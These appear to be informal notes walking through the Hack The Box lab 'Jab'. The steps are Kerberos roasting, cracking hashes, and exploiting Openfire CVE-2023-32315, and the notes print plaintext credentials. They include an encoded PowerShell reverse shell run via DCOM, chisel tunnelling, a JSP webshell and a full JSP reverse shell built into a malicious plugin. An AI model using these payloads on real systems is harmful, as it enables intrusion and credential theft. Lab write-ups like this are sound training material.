53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5269,5270,5275,5276,5985,7070,7443,7777,9389,47001,49664,49665,49666,49667,49671,49686,49687,49688,49712,49766
echo "10.129.225.173 jab.htb dc01.jab.htb" >> /etc/hosts
Â
kerbrute userenum -d jab.htb --dc 10.129.225.173 /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt
generated a very large username lists. not useful as from now.
back to port 5222, searching online
nothing found
move on
7070/tcp open realserver
it shows
Openfire HTTP Binding Service
Â
download pidgin
Â
register a new account, login.
under
room list
function, i found 2 room, test and test2.room test cannot be opened, while i find a
bdavis
user in room test2.bdavis were trying to send a xss payload in the channel.
(Wednesday, November 22, 2023 02:49:50 AM HKT) bdavis: <img src="data:image/png;base64,VGhlIGltYWdlIGRhdGEgZ29lcyBoZXJlCg==" alt="some text" />
try add a plugin called Service DIscovery
find 4 services available
search for user
sudo pidgin -d > output.log
add xmpp console plugin, then search for users
export them out as xml format (userlist file)
grep -oP '<value>\K[^<]+@jab.htb(?=</value>)' userlist | sed 's/@jab.htb//g' | sort | uniq > userlists rm userlist
GetNPUsers.py jab.htb/ -usersfile userlists -outputfile output -no-pass -dc-ip 10.129.225.173 -no-pass
enumerate again with new wordlists to find if there is any user is pre-auth set
get three account’s hashes
hashcat -m 18200 output /usr/share/wordlists/rockyou.txt
run hashcat to bruteforce the password, it takes time
get a credential
jmontgomery:Midnight_121
update this cred with pidgin
here comes a new room
pentest2003
, here is the history dialogue:(Wednesday, November 22, 2023 02:31:13 AM HKT) adunn: team, we need to finalize post-remediation testing from last quarter's pentest. @bdavis Brian can you please provide us with a status? (Wednesday, November 22, 2023 02:33:58 AM HKT) bdavis: sure. we removed the SPN from the svc_openfire account. I believe this was finding #2. can someone from the security team test this? if not we can send it back to the pentesters to validate. (Wednesday, November 22, 2023 03:30:41 AM HKT) bdavis: here are the commands from the report, can you find someone from the security team who can re-run these to validate? (Wednesday, November 22, 2023 03:30:43 AM HKT) bdavis: $ GetUserSPNs.py -request -dc-ip 192.168.195.129 jab.htb/hthompson Impacket v0.9.25.dev1+20221216.150032.204c5b6b - Copyright 2021 SecureAuth Corporation Password: ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------ -------- -------------------------- --------- ---------- http/xmpp.jab.local svc_openfire 2023-10-27 15:23:49.811611 <never> [-] CCache file is not found. Skipping... $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$b1abbb2f4beb2a48e7412ccd26b60e61$864f27ddaaded607ab5efa59544870cece4b6262e20f3bee38408d296ffbf07ceb421188b9b82ac0037ae67b488bb0ef2178a0792d62<SNIP> (Wednesday, November 22, 2023 03:30:56 AM HKT) bdavis: $ hashcat -m 13100 svc_openfire_tgs /usr/share/wordlists/rockyou.txt hashcat (v6.1.1) starting... <SNIP> $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$de17a01e2449626571bd9416dd4e3d46$4fea18693e1cb97f3e096288a76204437f115fe49b9611e339154e0effb1d0fcccfbbbb219da829b0ac70e8420f2f35a4f315c5c6f1d4ad3092e14ccd506e9a3bd3d20854ec73e62859cd68a7e6169f3c0b5ab82064b04df4ff7583ef18bbd42ac529a5747102c2924d1a76703a30908f5ad41423b2fff5e6c03d3df6c0635a41bea1aca3e15986639c758eef30b74498a184380411e207e5f3afef185eaf605f543c436cd155823b7a7870a3d5acd0b785f999facd8b7ffdafe6e0410af26efc42417d402f2819d03b3730203b59c21b0434e2e0e7a97ed09e3901f523ba52fe9d3ee7f4203de9e857761fbcb417d047765a5a01e71aff732e5d5d114f0b58a8a0df4ca7e1ff5a88c532f5cf33f2e01986ac44a353c0142b0360e1b839bb6889a54fbd9c549da23fb05193a4bfba179336e7dd69380bc4f9c3c00324e42043ee54b3017a913f84a20894e145b23b440aff9c524efb7957dee89b1e7b735db292ca5cb32cf024e9b8f5546c33caa36f5370db61a9a3facb473e741c61ec7dbee7420c188e31b0d920f06b7ffc1cb86ace5db0f9eeaf8c13bcca743b6bf8b2ece99dd58aff354f5b4a78ffcd9ad69ad8e7812a2952806feb9b411fe53774f92f9e8889380dddcb59de09320094b751a0c938ecc762cbd5d57d4e0c3d660e88545cc96e324a6fef226bc62e2bb31897670929571cd728b43647c03e44867b148428c9dc917f1dc4a0331517b65aa52221fcfe9499017ab4e6216ced3db5837d10ad0d15e07679b56c6a68a97c1e851238cef84a78754ff5c08d31895f0066b727449575a1187b19ad8604d583ae07694238bae2d4839fb20830f77fffb39f9d6a38c1c0d524130a6307125509422498f6c64adc030bfcf616c4c0d3e0fa76dcde0dfc5c94a4cb07ccf4cac941755cfdd1ed94e37d90bd1b612fee2ced175aa0e01f2919e31614f72c1ff7316be4ee71e80e0626b787c9f017504fa717b03c94f38fe9d682542d3d7edaff777a8b2d3163bc83c5143dc680c7819f405ec207b7bec51dabcec4896e110eb4ed0273dd26c82fc54bb2b5a1294cb7f3b654a13b4530bc186ff7fe3ab5a802c7c91e664144f92f438aecf9f814f73ed556dac403daaefcc7081957177d16c1087f058323f7aa3dfecfa024cc842aa3c8ef82213ad4acb89b88fc7d1f68338e8127644cfe101bf93b18ec0da457c9136e3d0efa0d094994e1591ecc4:!@#$%^&*(1qazxsw Session..........: hashcat Status...........: Cracked Hash.Name........: Kerberos 5, etype 23, TGS-REP Hash.Target......: $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openf...91ecc4 Time.Started.....: Fri Oct 27 15:30:12 2023 (17 secs) Time.Estimated...: Fri Oct 27 15:30:29 2023 (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 873.9 kH/s (10.16ms) @ Accel:64 Loops:1 Thr:64 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 14344385/14344385 (100.00%) Rejected.........: 0/14344385 (0.00%) Restore.Point....: 14336000/14344385 (99.94%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: $HEX[2321686f74746965] -> $HEX[042a0337c2a156616d6f732103] Started: Fri Oct 27 15:30:09 2023 Stopped: Fri Oct 27 15:30:29 2023 (Wednesday, November 22, 2023 03:31:57 AM HKT) adunn: I'll pass this along and circle back with the group (Wednesday, November 22, 2023 03:32:23 AM HKT) bdavis: perfect, thanks Angela! (Wednesday, November 22, 2023 02:22:55 AM HKT) The topic is:
found another credential
svc_openfire:!@#$%^&*(1qazxsw
in this roomevil-winrm -i 10.129.225.173 -u jab.htb/svc_openfire -p '!@#$%^&*(1qazxsw'
try this creds on evil-winrm , but it failed to login
impacket-dcomexec -object MMC20 jab.htbenfire:'!@#$%^&*(1qazxsw'@10.129.230.215 'cmd.exe /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAAiACwANgA2ADYANgApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=' -nooutput
get the connection back
upload a chisel for port fowarding
chisel server -p 3456 --reverse . ./chisel.exe client -v 10.10.14.4:3456 R:9090:127.0.0.1:9090
googling for exploit, i found
CVE-2023-32315
miko550 • Updated Aug 3, 2024
this Poc does not work for creating a new admin account
as i tried the previous creds i got from
svc_openfire
, i login in into the admin panelcontinue exploitation
page that for uploading plugins
back to article
https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass/releases
CVE-2023-32315-Openfire-Bypass
tangxiaofeng7 • Updated Jun 12, 2024
uploaded but not accessible
create a webshell called webshell.jsp:
<% String cmd = request.getParameter("cmd"); if ( cmd != null) { java.io.DataInputStream in = new java.io.DataInputStream(Runtime.getRuntime().exec(cmd).getInputStream()); String line = in.readLine(); if (line != null) { response.setHeader("X-Error", line); } } %>
Then pack up to merge a .jar payload as plugin.
git clone https://github.com/igniterealtime/openfire-exampleplugin.git cd openfire-exampleplugin cp ../webshell.jsp ./src/main/web/exampleplugin-page.jsp mvn -B package cp ./target/exampleplugin.jar exampleplugin.zip; zip -ur exampleplugin.zip ./plugin.xml ./readme.html; mv exampleplugin.zip ./target/exampleplugin.jar;
it’s time-intensive to build under maven
upload
curl -v "http://127.0.0.1:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/plugins/exampleplugin/exampleplugin-page.jsp?cmd=whoami"
seems it doesn’t work, i then create a jsp reverse shell and do the build again
<% /* * Usage: This is a 2 way shell, one web shell and a reverse shell. First, it will try to connect to a listener (atacker machine), with the IP and Port specified at the end of the file. * If it cannot connect, an HTML will prompt and you can input commands (sh/cmd) there and it will prompts the output in the HTML. * Note that this last functionality is slow, so the first one (reverse shell) is recommended. Each time the button "send" is clicked, it will try to connect to the reverse shell again (apart from executing * the command specified in the HTML form). This is to avoid to keep it simple. */ %> <%@page import="java.lang.*"%> <%@page import="java.io.*"%> <%@page import="java.net.*"%> <%@page import="java.util.*"%> <html> <head> <title>jrshell</title> </head> <body> <form METHOD="POST" NAME="myform" ACTION=""> <input TYPE="text" NAME="shell"> <input TYPE="submit" VALUE="Send"> </form> <pre> <% // Define the OS String shellPath = null; try { if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) { shellPath = new String("/bin/sh"); } else { shellPath = new String("cmd.exe"); } } catch( Exception e ){} // INNER HTML PART if (request.getParameter("shell") != null) { out.println("Command: " + request.getParameter("shell") + "\n<BR>"); Process p; if (shellPath.equals("cmd.exe")) p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("shell")); else p = Runtime.getRuntime().exec("/bin/sh -c " + request.getParameter("shell")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } // TCP PORT PART class StreamConnector extends Thread { InputStream wz; OutputStream yr; StreamConnector( InputStream wz, OutputStream yr ) { this.wz = wz; this.yr = yr; } public void run() { BufferedReader r = null; BufferedWriter w = null; try { r = new BufferedReader(new InputStreamReader(wz)); w = new BufferedWriter(new OutputStreamWriter(yr)); char buffer[] = new char[8192]; int length; while( ( length = r.read( buffer, 0, buffer.length ) ) > 0 ) { w.write( buffer, 0, length ); w.flush(); } } catch( Exception e ){} try { if( r != null ) r.close(); if( w != null ) w.close(); } catch( Exception e ){} } } try { Socket socket = new Socket( "10.10.14.4", 4444 ); // Replace with wanted ip and port Process process = Runtime.getRuntime().exec( shellPath ); new StreamConnector(process.getInputStream(), socket.getOutputStream()).start(); new StreamConnector(socket.getInputStream(), process.getOutputStream()).start(); out.println("port opened on " + socket); } catch( Exception e ) {} %> </pre> </body> </html>
cd openfire-exampleplugin cp ../webshell.jsp ./src/main/web/exampleplugin-page.jsp mvn -B package cp ./target/exampleplugin.jar exampleplugin.zip; zip -ur exampleplugin.zip ./plugin.xml ./readme.html; mv exampleplugin.zip ./target/exampleplugin.jar;
it works!
rooted!
Â